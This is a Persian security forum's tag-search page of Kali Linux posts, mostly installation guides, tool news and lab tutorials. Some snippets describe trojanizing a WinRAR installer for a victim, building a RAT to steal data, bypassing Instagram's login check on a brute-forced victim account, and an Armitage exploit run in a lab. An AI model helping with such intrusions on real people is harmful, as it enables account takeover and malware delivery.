جستجو در تالار

در حال نمایش نتایج برای برچسب های 'kali'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


Product Groups

  • بسته های آموزشی
  • ارتقا به کاربر ویژه

تالار ها

  • اخبار و اعلانات انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • بخش مسابقات انجمن
    • انتقادات و پیشنهادات
    • افتخارات و اطلاعیه های تیم گارد ایران
    • بخش ارتقاء کاربران
    • اخبار هک و امنیت
    • اکسپلویت های ثبت شده توسط تیم امنیتی گارد ایران
    • برنامه ها و ابزارهای نوشته توسط گارد ایران
  • بخش های خصوصی انجمن گاردایران
    • سوال و جواب های عمومی
    • بخش خصوصی
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • بخش کرک و رمزنگاری
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Mikrotik
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

دسته ها

  • ویدیوهای آموزشی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


محل سکونت


Interests

30 نتیجه پیدا شد

  1. درود آموزش نصب کالی لایو ( به کمک ابزار / کامند از طریق سیستم لینوکسی ) - نسخه لایو چیست ؟ بسیاری از ابزار های عیب یابی هارد ، .... و سیستم عامل ها در کنار نسخه اصلی یک توزیع لایو / بوتیبل نیز ارائه میدند که این نسخه های لایو درون یک Removable Device چون فلش مموری ، دیسک و .... نصب میگردد . نسخه لایو پس از بوت شدن درون حافظه رم که یک حافظه فرار هست اجرا شده و برای اجرا شدن تغییری بروی هارد ایجاد نکرده - و اما هدف از این توزیع چیه ؟ نسخه لایو یک نسخه کم حجم از سیستم عامل اصلیه که به راحتی میتونید روی فلش مموریتون ست و اونو حمل کنید ! اکثر این توزیع ها Read Only بوده و پس از رستارت سیستم از حافظه رم پاک گشته و همه چی به حالت اول نسخه لایو برگشته ; و اما بعضی از این نسخه های لایو که موضوع اصلی این آموزش هست دارای آپشن USB Presistence هست USB Presistence یک نسخه لایو با قابلیبت Read and Write رو برای کاربر فراهم میکنه در این آموزش به برسی نسخه لایو کالی لینوکس میپردازیم : * نسخه لایو * نسخه لایو با قابلیت USB Presistence در زیر ابزاری رو پیوست میکنم که به کمک اون میتونید از طریق سیستم عامل ویندوزی خودتون بعد از انتخاب کردن USB Drive مورد نظر ، انتخاب فایل ISO (linux Live 2016) و تعیین فضای داده ی پایدار (Presistence) به راحتی USB Drive خودتون رو به یک لینوکس بوتیبل تبدیل کنید همینطور در ادامه آموزش ، دستوراته لینوکس بیسی رو ارائه میدم که با استفاده از اون دستورات میتونید از طریق سیستم عامل لینوکسی خود لینوکس لایو رو بر روی فلش مموری خودتون ست کنید ; و اقدام به اختصاص حافظه ی پایدار (Presistence) کنید . پسورد فایل : guardiran.org LinuxLive USB Creator 2.9.4.rar
  2. mostafaRAT

    با سلام دوستان من امروز نسخه debianکالی لینوکس2018.2 رو نصب کردم روی ماشین مجازی هنگام وارد کردن دستوراتی مثل apt-get ارور میده و یا هنگام استفاده از اکسپولیت میزنه دستور پیدا نشد مشکل چیه؟؟/
  3. نگارش 1.0.0

    15 دریافت

    بسم الله الرحمن الرحیم با سلام پکیج آموزشی کالی لینوکس تماماً توسط تیم گارد ایران تهیه شده و تمامی آموزش ها همراه با مثال برای شما عزیزان ضبط شده. ویدو ها از کیفیت بالا برخوردار هستن و در کنار آموزش کالی لینوکس ، آموزش های دیگری هم قرار داده شده. مثل : آشنایی با دستورات لینوکسی ، برنامه نویسی در کالی لینوکس ، بش نویسی ، ابزارهای مورد نیاز در آموزش ها و... توضیحات: این پکیج بیش از 100 آموزش تصویری همراه با ابزار های مورد نیاز هست که حجم فشرده نشده این پکیج حدود 4 گیگابایت است. حجم فشرده شده و آپلود شده در انجمن 380 مگابایت است. این پکیج در کمترین زمان از شما یک حرفه ای لینوکس میسازه😎

    600٬000 ریال

  4. a.a.a

    با سلام به چه دستوراتی میشه در کالی رات ساخت و بعد اطلاعات ر و کشید بیرون
  5. با سلام خدمت دوستان عزیز چند روز پیش نسخه جدیدی از کالی لینوکس با شماره نسخه 2017.3 منتشر شده و یک سری ویژگی ها شامل همه ی پچ ها، فیکس ها (حل مشکلات)، بروزرسانی ها و بهینه سازی های ممکن هست و همچنین یک سری ابزار هم بهش اضافه شده که بطور مختصر دربارشون توضیح میدم. لینک صفحه دانلود کالی لینوکس 2017.3 این رو در نظر داشته باشید که این پنج ابزار بصورت پیشفرض موجود نیستند و پس از نصب کالی میتونید از دستور apt update کنید و هر کدوم که خواستید رو نصب کنید. 1- ابزار InSpy این ابزار برای شناسایی افراد بر طبق شغل، اسم، محل کار و باقی مشخصات کاری توی وبسایت لینکدین هست. وبسایت لینکدین برای کاربرانش اشتراک یک ماهه رایگان برای تبدیل شدن به اکانت پرمیوم رو میده تا کاربرانی که برای جستجوی شغل ویژه ، سازمان ویژه و یا متخصصین خاصی میگردن بتونن اونها رو پیدا کنن اما متاسفانه این ویژگی برای ما ایرانیها قابل استفاده نیست. همچنین جستجوی لینکدین هم محدود هست اما این ابزار میتونه بدون محدودیت جستجو رو برای شما انجام بده. root@kali:~# apt update && apt -y install inspy root@kali:~# inspy --empspy /usr/share/inspy/wordlists/title-list-large.txt google InSpy 2.0.3 2017-11-14 14:04:47 53 Employees identified 2017-11-14 14:04:47 Birkan Cara Product Manager at Google 2017-11-14 14:04:47 Fuller Galipeau Google 2017-11-14 14:04:47 Catalina Alicia Esrat Account Executive at Google 2017-11-14 14:04:47 Coplan Pustell Recruiter at Google 2017-11-14 14:04:47 Kristin Suzanne Lead Recruiter at Google 2017-11-14 14:04:47 Baquero Jahan Executive Director at Google 2017-11-14 14:04:47 Jacquelline Bryan VP, Google and President of Google.org 2017-11-14 14:04:47 Icacan M. de Lange Executive Assistant at Google ... 2- ابزار CherryTree این یه ابزار Note هست که خود کالی هم تعریفش رو میکنه root@kali:~# apt update && apt -y install cherrytree 3-ابزار Sublist3r این ابزار برای پیدا کردن زیردامنه های یک وبسایت از طریق چندین منبع هست و وبسایت کالی گفته که با ابزار SubBrute هم یکپارچه شده تا بتونید به زیردامنه ها با استفاده از Bruteforce و پسوردلیست حمله کنید و اقدام به کرک کنید. فکر میکنم استفاده بعدیش هم شناسایی زیردامنه های یه وبسایت برای تشخیص آی پی اصلی وبسایت، بایپس Cloudflare و اقدام به DDOS هست. root@kali:~# apt update && apt -y install sublist3r root@kali:~# sublist3r -d google.com -p 80 -e Bing ____ _ _ _ _ _____ / ___| _ _| |__ | (_)___| |_|___ / _ __ \___ \| | | | '_ \| | / __| __| |_ \| '__| ___) | |_| | |_) | | \__ \ |_ ___) | | |____/ \__,_|_.__/|_|_|___/\__|____/|_| # Coded By Ahmed Aboul-Ela - @aboul3la [-] Enumerating subdomains now for google.com [-] Searching now in Bing.. [-] Total Unique Subdomains Found: 46 [-] Start port scan now for the following ports: 80 ads.google.com - Found open ports: 80 adwords.google.com - Found open ports: 80 analytics.google.com - Found open ports: 80 accounts.google.com - Found open ports: 80 aboutme.google.com - Found open ports: 80 adssettings.google.com - Found open ports: 80 console.cloud.google.com - Found open ports: 80 ... 4-فریمورک جدید OSRFramework این یه OSNIT TOOL (ابزار اطلاعاتی اوپن سورس) عالی هست و دارای مجموعه ای از اسکریپت هایی هست که برای شناسایی یوزرها، دامین ها و دیگر موارد ‍از طریق 200 سرویس مختلف ، مفید هست. root@kali:~# apt update && apt -y install osrframework root@kali:~# searchfy.py -q "dookie2000ca" ___ ____ ____ _____ _ / _ \/ ___|| _ \| ___| __ __ _ _ __ ___ _____ _____ _ __| | __ | | | \___ \| |_) | |_ | '__/ _` | '_ ` _ \ / _ \ \ /\ / / _ \| '__| |/ / | |_| |___) | _ <| _|| | | (_| | | | | | | __/\ V V / (_) | | | < \___/|____/|_| \_\_| |_| \__,_|_| |_| |_|\___| \_/\_/ \___/|_| |_|\_ Version: OSRFramework 0.17.2 Created by: Felix Brezo and Yaiza Rubio, (i3visio) searchfy.py Copyright (C) F. Brezo and Y. Rubio (i3visio) 2014-2017 This program comes with ABSOLUTELY NO WARRANTY. This is free software, and you are welcome to redistribute it under certain conditions. For additional info, visit https://www.gnu.org/licenses/agpl-3.0.txt 2017-11-14 14:54:52.535108 Starting search in different platform(s)... Relax! Press <Ctrl + C> to stop... 2017-11-14 14:55:04.310148 A summary of the results obtained are listed in the following table: Sheet Name: Profiles recovered (2017-11-14_14h55m). +---------------------------------+---------------+------------------+ | i3visio_uri | i3visio_alias | i3visio_platform | +=================================+===============+==================+ | http://github.com/dookie2000ca | dookie2000ca | Github | +---------------------------------+---------------+------------------+ | http://twitter.com/dookie2000ca | dookie2000ca | Twitter | +---------------------------------+---------------+------------------+ 2017-11-14 14:55:04.327954 You can find all the information collected in the following files: ./profiles.csv 2017-11-14 14:55:04.328012 Finishing execution... Total time used: 0:00:11.792904 Average seconds/query: 11.792904 seconds Did something go wrong? Is a platform reporting false positives? Do you need to integrate a new one and you don't know how to start? Then, you can always place an issue in the Github project: https://github.com/i3visio/osrframework/issues Note that otherwise, we won't know about it! 5- ابزار محبوب Maltego (صفحه دانلود ) این ابزار یکی از بهترین ابزار جمع آوری اطلاعات تهیه شده توسط وبسایت Paterva در زمان شروع حمله هست و میتونه شناسایی ها که اولین اقدام هر حمله هستن رو به نحو احسن انجام بده و حتی ابزار Maltego Casefile (ابزاری بعنوان هوش تصویری که ارتباطات بین داده ها رو میسنجد) هم همراهش هست. (اینجا دیگه جا برای توضیح maltego , casefile نیست، ایشالا توی یه تاپیک تخصصی توضیح داده میشه )
  6. سلام تو این اموزش شما با هک ویندوز و بعد دسترسی همیشگی به کلاینت اشنا میشید (روی هر ویندوز جواب میده) از این اموزش میتوانید یاد بگیرید که چه گونه هکر ها به سیستم های شما نفوذ میکنند و اطلاعات شما رو به سرقت میبرند.در صورت مشاهده ی هرگونه نشانه ای همانند اموزش بالا در داخل فیل ارسالی:از باز کردن اون خود داری کنید. باز کردن پورت برای مودم های dlink هم اموزش میدم دقت کنید در اینجا من فایل نصب winrar رو میدم به طرف (فایل الودست به پیلود من!) ببینیم چقدر استقبال داره تو انجمن اپلود نشد لینک : دانلود
  7. با سلام خدمت کلیه دوستان و اساتید امروز تصمیم گرفتم که دوره آموزش تست نفوذ همراه با زیرنویس فارسی در اختیار همه علاقمندان بذارم تا بتونن با کار های ضروری تست نفوذ آشنا بشن. این دوره توسط آقای مالکوم شور آموزش داده میشه. سرفصل ها: 00- معرفی (3 ویدیو - ~3 دقیقه) 01- تست نفوذ چیست؟ (2 ویدیو - ~16 دقیقه) 02- ابزار تست نفوذ (6 ویدیو - ~28 دقیقه) 03- اسکریپت نویسی بش (3 ویدیو - ~6 دقیقه) 04-اسکریپت نویسی پایتون (7 ویدیو - ~21 دقیقه) 05- کالی و متااسپلویت (7 ویدیو - ~25 دقیقه) 06-تست نفوذ وب (4 ویدیو - ~16 دقیقه) 07-درک کدهای اکسپلویت (4 ویدیو - ~35 دقیقه) 08- جمع بندی (1 ویدیو - ~2 دقیقه) طول دوره : جمعا 2 ساعت و 29 دقیقه درجه بندی سطح: متوسط ( Intermediate ) من هر قسمت رو با فاصله ارسال میکنم. چونکه اول باید زیرنویس رو ترجمه کنم بعد استارتر رو بهش بچسبونم و کلی دردسر دیگه. از فصل دو به بعد هم موارد آموزشی یه خورده تخصصی میشن و نیاز به حفظ کردن و تسلط دارن. پس توی فاصله ی بین هر آموزش هم سعی کنید با تکرار عملی آموزشی ها، اونا رو یاد بگیرید. آموزش ها حاوی فایل ویدیویی بهمراه زیرنویس فارسی هستن تا بتونید روی هر دستگاهی اونا رو مشاهده کنید. بدلیل آموزشی بودن پست به هیچ وجه اقدام به ارسال اسپم جهت تشکر و یا پرسیدن سوال نکنید. اگر ابهام، مشکل و یا سوالی داشتید بصورت خصوصی بپرسید ، تشکر هم که دکمه داره. اسپم ممنوع پسورد کلیه فایل های فشرده هم : guardiran.org امیدوارم لذت ببرید. کیفیت ویدیو ها : HD 720p چنانچه استقبال خوبی بشه، در سطح گسترده انواع آموزش ها رو ارائه خواهیم داد. از همینجا اعلام میکنم که ویدیوی آموزشی بدون واترمارک هست و امکان انتشار و اشتراک ویدیو وجود داره. پس باید بگم که مسئولیت هرگونه سوءاستفاده از دوره های آموزشی فقط و فقط بر عهده کاربر خاطی هست.
  8. Conqueror_Boy

    با سلام خدمت اساتید محترم. من کالی لینوکس رو در ویچرال باکس نصب کردم و موقع اجرا اون با این تصویر مواجه میشم میشه لطفا راهنماییم کنید که چکار باید انجام بدم؟
  9. mownten

    با عرض سلام خدمت دوستان توی این پست قصد دارم توضیحات مختصری رو در خصوص ابزار Trity ارائه بدم. Trity به ادعای نویسنده ش و برخی وبسایت های معرفی نرم افزار یه ابزار پیشرفته تست نفوذ مبتنی بر لینوکس هست که برای هرکاری از تست آسیب پذیری تا اسپوفینگ تا مسائل مربوط به رمزنگاری رو پوشش میده. تو محیط کالی، ترمینال رو باز کنید و از این کد برای نصب تریتی استفاده کنید: git clone https://github.com/toxic-ig/Trity.git بعد از دانلود، به پوشه تریتی مراجعه کنید. (برای این کار بنویسید LS و اگر توی نتیجه اسم پوشه رو دیدی بنویسید : cd trity بعد از ورود به پوشه بنویسید : sudo python install.py از اونجا که ابزار تریتی دارای یک سری وابستگی ها (Dependencies) هست، این دستور باعث میشه که کالی وابستگی ها و پیش نیازها رو بررسی کنه و اگر هم نصب نبودند، شروع میکنه به دانلود اونها. اگر در آینده فریمورک دیگه ای هم مورد نیاز باشه دانلود میکنه. بعد از اینکه این مراحل تموم شد، اسم برنامه رو بنویسید و اینتر کنید: trity نکته هم اینکه اگر در زمان نصب این ابزار با خطای import مثل خطای ImportError: No module named mechanize مواجه شدید، از این کد برای حل مشکل و نصب magazine استفاده کنید: sudo apt-get install python-mechanize فایل zip این ابزار هم با پسورد guardiran.org پیوست کردم اما سعی کنید دستی نصبش کنید تا با تایپ کردن کد حل مسایل توی ذهنتون بمونه. تصویری از محیط نرم افزار : Trity-master.zip
  10. سلام بر همه دوستان عزیز بعضی وقت ها پیش میاد که تصمیم داشته باشید مک آدرس خودتون رو توی محیط کالی تغییر بدید اما چطوری؟ با چند خط دستور توی Terminal میشه مک آدرس رو عوض کرد Terminalرو باز کنید و بنویسید: ifconfig | grep HWaddr توی نتیجه مک آدرس اصلی رو به شما نشون میده که معمولا بعنوان eth0 شناخته میشه. برای تغییر مک آدرس خودتون (و آمادگی برای حمله ای که مدنظر دارید)، اول از همه باید دستگاه شبکه خودتون رو غیرفعال کنید. از این کد استفاده کنید: ifconfig eth0 down حالا ما میتونیم مک آدرس جدید رو با این کد ثبت کنیم: ifconfig eth0 hw ether 00:00:00:00:00:02 *** اینجا توی آدرس 00:00:00:00:00:02 میتونید از هر عدد و یا حرف انگلیسی که خواستید استفاده کنید. *** حالا بعد از تغییر مک آدرس، با این کد دستگاه شبکه رو فعال کنید: ifconfig eth0 up --- حالا یه سوال. این تغییر مک آدرس موقتیه یا دائم؟ این روش موقت هست و برای تغییر دائم مک آدرس از دستورالعمل زیر استفاده کنید. کالی لینوکس بر مبنای Debian ساخته شده. توی Debian مشخصات همه دستگاه های شبکه توی این آدرس قرار داره: /etc/network/interfaces پس ما هم به این آدرس میریم و دستگاه شبکه رو برای یه تغییر دائمی تنظیم میکنیم. الان ما باید فایل مربوط به تنظیمات دستگاه شبکه رو با یه ویرایشگر متن فراخوانی بکنیم و تغییرات رو اعمال کنیم. من اینجا از pico text editor استفاده میکنم ولی شما میتونید از هر ویرایشگر دیگه ای که خواستید هم استفاده کنید Terminal رو باز کنید و این دستور رو بنویسید: pico /etc/network/interfaces بعد از اینکه فایل باز شد توی خط آخر این کد رو اضافه کنید: pre-up ifconfig eth0 hw ether 00:00:00:00:00:02 این کار باعث میشه که بعد از اجرای سیستم عامل، این کد توسط سیستم عامل فراخوانی و اجرا بشه و مک آدرس شما در هر بار اجرای کالی تغییر کنه. تمام. اگر هم یک زمانی نخواستید که این تغییر مک آدرس دیگه اجرا نشه کافیه که فقط یه دونه # اول خط بنویسید تا تاثیر کد از بین بره. موفق باشید
  11. amirx_z

    با سلام خدمت اساتید گارد ایران من بعد از اینکه پسورد اکانت اینستاگرام رو با استفاده از (brutesploit) پیدا میکنم نمیتونم وارد اکانت بشم و ارور (We Detected An Unusual Login Attempt) دریافت میکنم که باید یا با ایمیل یا با شماره تلفن و یا گوشی خوده قربانی تایید کنید که هک نیست. من میخواستم بدونم برای دور زدن این ارور راهی هست ؟ یا به اسکریپت یا برنامه خاصی نیاز داره ؟
  12. adels1

    با سلام . می خواستم از ابزار های جمع آوری گزارش تو کالی لینوکس استفاده کنم که بتونم خروجی ابزار های nmap,nessus,nexpose رو به برنامه import کنم و خروجی ورد بهم بده . کدوم ابزار این قابلیت و داره ؟؟؟ تشکر میکنم اگه کسی بتونه کمکم کنه . سپاس
  13. alizombie

    با سلام خدمت شما دوستان گرامی بعد از این که متوجه ی این شدم که اموزش های سیستم عامل کالی لینوکس در انجمن دیگر گذاشته نمیشود و دوستان میخواهند که اموزش هارو از صفر یاد بگیرن بنا به این شدم که دست به کار بشم و با کمک دوستان عزیز در انجمن اگر نواقصی دیدن در تاپیک ها کمک کنن تا بر طرف بشه..... دوستان تازه کار و مدیران شبکه و حتی یا وبمستران هم میتوانند از این اموزش ها برای محک زدن امنیت سایت خود استفاده کنند و در صورت مشاهده ی نقطه ی ضعف انرا بر طرف کنند.لطفا از اموزش ها برای افزایش امنیت سایت های خودتون استفاده کنید تا کمتر شاهد هک شدن سایت های ایرانی باشیم. در صورت نیاز به مشاوره و کمک جدی میتونید به صورت پیام خصوصی با ما در تماس باشید. قوانین تاپیک: اسپم ممنوع(دوستان عزیز چون خود اموزش ها طولانی هست لطف کنین و اسپم ندید در صورت مشاهده با کاربربرخورد میشه) ((سوالات خودتون رو درلینک زیر بپرسین تا به انها خودم و یا دیگر مدیران جواب بدن)) http://guardiran.org/forums/topic/2259-سوالات-مربوط-به-بخش-اموزش-کالی-لینوکس/?p=9251 از قرار دادن اموزش های تکراری پرهیز کنین در صورت گذاشتن ابزاری خاص لینک اسکن فراموش نشود با تشکر فراوان از شما دوستان گرامی
  14. سلام آموزش نصب انواع سیستم عامل لینوکس بر روی گوشی اندروید در راستای تلاش سازندگان لینوکس در جهت افزایش کاربران سیستم عاملشون لینوکس دیپلوی (Linux Deploy) رو ساختند. یه جورایی تو مراحل اولیه هستش . همه ی فایل های مورد نیاز در پیوست موجوده. 1. یکی از طریقه های نصب لینوکس روی گوشی اندروید استفاده از Linux Deploy میباشد که سادست اما دسترسی روت میخواد. *پس در قدم اول باید گوشی روت باشه. *بعد از روت کردن مراحل زیر رو ادامه بدین: 2. نرم افزار لینوکس دیپلوی (Linux Deploy) رو نصب کنید. بعد از نصب نرم افزار رو اجرا کنید و برید به قسمت Config که در بالا <...> رو بزنین میبینین. *در قسمت Config با زدن Distribution نوع لینوکس مورد نظر رو انتخاب کنید. *Linux Deploy از نسخه های مختلف لینوکس پشتیبانی میکنه مثله : Kali , Debain, Ubuntu. *از قسمت Installation path مسیر ایجاد فایل img رو تعیین کنید (به طور پیشفرض روی حافظه خارجی ایجاد میشه که ایرادی هم نداره). * یکم پایین تر گزینه های SSH و VNC رو فعال کنید که برای دست رسی به محیط گرافیکی و ست کردن ترمینال با لینوکس آماده باشه. در نهایت install رو بزنید و صبر کنید که دانلود و نصب تموم شه (به نت کانکت باشید). 3.نرم افزار Terminal Emulator رو نصب و اجرا کنید : * بعد از اجرا دستور رو به رو رو وارد کنید تا SSH کانکشن از ترمینال داشته باشیم : username@ipaddress بعد از @ به جای ipaddress داخل نرم افزار Linux Deploy اون بالا ip تون رو نشون میده، وارد کنید. به جای username هم یوزرنیمی که در قسمت config میتونین تغییر بدین رو وارد کنید که به صورت پیشفرض kali هست الان ترمینال آمادس واسه استفاده با Command های لینوکس. 4.نرم افزار VNC Viewer رو برای مشاهده محیط گرافیکی لینوکس نصب کنید. با زدن علامت + اون پایین به جای Address وارد کنید localhost. و به جای name هرچی میخواین وارد کنید. با زدن connect به محیط گرافیکی وصل خواهید شد. بعد از اون از شما پسورد میخواد که پسورد پیشفرض changeme هست که با وارد کردن کامند : sudo passwd root میشه اون رو به root تغییر داد. در نهایت برای افزایش سرعت محیط نسبتا کند دستور زیر رو در ترمینال وارد کنید : dsl toram noacpi noapm noscsi dma سوالی بود بپرسین. d0kt0r Linux-Deploy-1.5.1[Androidiha.Com].apk VNC-Viewer-3.1.0.025890(FarsRoid.Com).apk Better_Terminal_Emulator_Pro_v4.03.apk
  15. با سلام خدمت تمامی همراهان عزیز چون آموزش تصویری و آپلود کردن تصاویر در وب سایت و چیدمان سخت و دشوار است یک وب سایت به شما معرفی کردم.با این سیستم عامل میتونید به انجام تست نفوذ و محک زدن امنیتسیستم گوشی و حتی سرور ها بپردازید!!! http://day.ir/articles/virtualmachine/Kali-Linux بفرمایین اگه استفاده کردین تشکر کنین.
  16. سلام یکی از اولین اقدامات در انجام تست نفوذ :جمعاوری اطلاعات هست که در این اموزش شما رو با روش جمع اوری ایمیل های یک سایت با استفاده از ابزار متااسپلویت در کالی اشنا میکنیم. Password : Guardiran.org Email+meta.rar
  17. با سلام با دوره ی ویژه کالی لینوکس درخدمتتون هستم بنده به شخصه دوره های کمی را در سطح اینترنت دیده ام که دوره کامل کالی لینوکس را گذاشته باشند از تمامی دوستان خواهشمند هستم تا برای افزایش کیفیت اموزش ها نظرات خودشان را درباره هر قسمت به بنده در پیام خصوصی اعلام کنند ان شالله که دوستان به خوبی حمایت کنند و بنده را نیز دلگرم اموزش ها اختصاصی تیم امنیتی گارد ایران می باشد کیفیت قسمت ها: خوب صدا: دارد زبان: فارسی پسورد:guardiran.org
  18. با سلام. یکی از باگ ها (ضعف امنیتی) شناختخ شده در میان هکر ها sql injection میباشد .متاسفانه این باگ در بیشتر سایت های اسیب پذیر یافت میشه و میتوان به جرات گفت که یکی از خطرناک ترین باگ های شناخته شده هست!!!!شما میتونید با استفاده از ابزار sqlmap در سیستم عامل کالی لینوکس سایت خودتون رو محک بزنید که ایا این اسیب پذیری در سایت شما هم وجود داره یا خیر.... خوب چون تاپیکی که در این رابطه زده شده بود ادامه پیدا نکرد یک آموزش جامع براتون آماده کردم. امیدوارم از این آموزش نهایت بهره رو برده باشید یا علی pass:guardiran.org sqlmap-hacking.part1.rar sqlmap-hacking.part2.rar
  19. با سلام بیشتر وبمستران برای محافظت از پسورد وبسایت خود پسورد هارو به صورت هش ذخیره میکنند.در این اموزش شما رو با یکی از ابزار های تست امنیت اشنا میکنم که بسیار کاربردی هست....در این آموزش تصویری شما رو با کرک هش hash توسط یکی از ابزارهای کالی kali به نام findmyhash آشنا میکنم findmyhash یکی از قدرتمند ترین ابزار موجود جهت کرک انواع هش موجود هستش ازدست ندیدو از اون برای ایمن سازی سایت های خودتون استفاده کنید... پسورد: guardiran.org FINDMYHASH.rar
  20. با سلام آموزش تصویری کار با اسکنر قدرتمند Vega رو در کالی لینوکس برای شما ضبط کردم و فیلم بهمراه توضیحات هست و از این اسکنر برای اسکن آسیب پذیری تارگت( ُScanner Target Vulnerability ) می تونید استفاده کنید .این اسکنر یکی از بهترین اسکنر های رایکان برای تشخیص اسیب پذیری های شناخته شده هست و 100 در 100 به افزایش امنیت سایت های شما کمک میکنه.... امیدوارم که از این اموزش نهایت استفاده رو ببرید پسورد : guardiran.org VEGA Scanner Kali Linux.rar
  21. وقتی که با واژه hacking و هک کردن مواجه می شویم ، به این نکته پی میبریم که امنیت ۱۰۰٪ نیست. این همان اتفاقی است که برای سیستم عامل Kali لینوکس از توزیع های BackTrack که برای تست نفوذ استفاده می شود رخ داده است. به گزارش آی تی اس ان (پایگاه خبری امنیت فناوری اطلاعات) ،چند روز پیش گروه هکری TGT یا The GreaT TeAm از لیبی زیردامنه lists.kali.org مربوط به وب سایت رسمی سیستم عامل Kali linux را هک و دیفیس کرد. این گروه در صفحه دیفیس خود عبارت “Hacked By The GreaT TeAm –TGT” را درج کردند. براساس گزارش هکرنیوز هاستینگ زیر دامنه lists.kali.org سایت mailmanlist.net می باشد که به ادعای هکرهای لیبیایی این سایت دارای آسیب پذیری Heartbleed بوده است. آنها توضیح داده اند که پس از بررسی کوکی های به سرقت رفته از سایت mailmanlist.net ، از آسیب پذیری Heartbleed موجود در لیست پستی کایلی لینوکس توانسته است به حساب کاربری سایت دسترسی پیدا کنند. لینک اثبات در zone_h http://www.zone-h.org/mirror/id/22278878?zh=1
  22. mhdei1380

    سلام به همگی دوستان یکی از مشکلاتی که شاید در kali باهاش مواجه شده باشید. نصب teamviewer هست . ( بخصوص در سیستم های ۶۴ بیتی ) خوب برای این کار روشی در سایت teamviewer ارائه شده که من خودم هم ازش نتونستم به نتیجه ای برسم اما در زیر روشی رو که برای نصب ازش استفاده کردم رو قرار میدم : ۱− وارد ترمینال شده و دستور زیر رو وارد کنید *: dpkg --add-architecture i386 apt-get update apt-get -f install ۲− و بعد از اتمام کار این دستور ؛ دستور زیر رو وارد کنید : apt-get install libc6-i386 lib32asound2 lib32z1 ia32-libs ۳− خوب حالا teamviewer 64bit رو از لینک زیر دانلود کنید : http://download.teamviewer.com/download/teamviewer_linux_x64.deb ۴− و بعد از اتمام دانلود دستور زیر رو وارد کنید : ( با ترمینال به همون دایرکتوری که فایل رو دانلود کردید برید − خیلی از دوستان تازه کار در خصوص exist file به من پ/خ دادن): dpkg -i teamviewer_linux_x64.deb خوب الان باید teamviewer توی منوی internet اضافه شده باشه . در صورتی که همچنان با ارور مواجه شدید این دستور رو مجددا وارد کنید : apt-get -f install نکته : در برخی موارد امکان داره بعد از ۴ مرحله بالا تیم نصب نشده باشه ؛ که در این صورت شاید دستور زیر کارساز باشه : ( با دقت استفاده کنید ) dpkg --force-depends -i teamviewer_linux_x64.deb −−−−−−−−−−−−−−−−//. موفق باشید یا علی
  23. سلام به همگی شاید iceweasel ( مرورگر پیشفرض kali ) خیلی شبیه فایرفاکس باشه و یا اصلا خود فایر فاکس باشه اما بنظر خیلی از دوستان به پای فایر فاکس نمیرسه حالا چطور فایرفاکس رو روی کالی نصب کنیم ؟ مراحل کار رو در ادامه توضیح میدم : 1- حدف iceweasel : apt-get remove iceweasel 2- افزودن repository های فایر فاکس :* echo -e "\ndeb http://downloads.sourceforge.net/project/ubuntuzilla/mozilla/apt all main" | tee -a /etc/apt/sources.list > /dev/null 3- افزودن gpg key : apt-key adv --recv-keys --keyserver keyserver.ubuntu.com C1289A29 4-آپدیت : apt-get update 5- نصب فایر فاکس : apt-get install firefox-mozilla-build خوب فایرفاکس نصب شد ؛ می تونید از منوی applications > internet بهش دسترسی پیدا کنید . --------------//. موفق باشید یا علی
  24. همون طور که به یکی ازدوستان قول داده بودم اموزش حمله با کالی به ویندوز سروری که هر دو روی ماشین مجازی نصب شده بودند رو گذاشتم سیستم اصلی ما یعنی همون سیستمی که ماشین مجازی روش نصبه ویندوز 7 هست دوستان این ترجمه وقت گرفت و از اونجایی که اولین بار که یه چنین نوع حمله ای به فارسی گذاشته میشه خواهشا ببخشید اگه مشکلی داره ولی خواهشا اسپم الکی ندید اگه سوالی بود در قسمت سوال و جواب بپرسید و خواهشا تشکر یادتون نره تارگت ما ویندوز سرور 2008 که روی ماسین مجازی نصب شده و سیستم اتکر هم کالی 2.0 هست که اونم روی ماشین مجازی نصب شده نکته بسیار مهم اینه که باید هر دو روی حالت bridge networking باشند با دستور ipconfig ای پی ویندوز رو بگیرید خب حالا آرمیتیج رو در کالی باز کنید در قسمت کانکت ، کانکت رو قبول کنید و استارت متااسپلویت رو بزنید خب در آرمیتیج روی hosts , nmapsacn , intensescan کلیک کنید تا صفحه ای باز بشه بعد ای پی ویندوز رو که گرفته بودید بنویسد و یه 32/ به اخرش اضافه کنید اسکن چند دقیقه طول میکشد و زمانی که با پیغام scan complete روبه رو شدید روی ok کلیک کنید و تارگت در صفحه ارمیتیج نشان داده میشود اکسپلویت کردن تارگت با easyftp_cwd_fixret attack در گوشه چپ آرمیتیج در قسمت سرچ بنویسید easyftp حالا روی easyftp_cwd_fixret نگه دارید و اون رو روی تارگت بذارید صفحه اتک به همراه مشخصات مربوطه باز میشود خب حالا گزینه9 windows universal v1.7.0.11 انتخاب و لانچ کنید ارور:اگه اررور کانکشن روبه رو شدید معمولا بخاطر از کار اقتادن 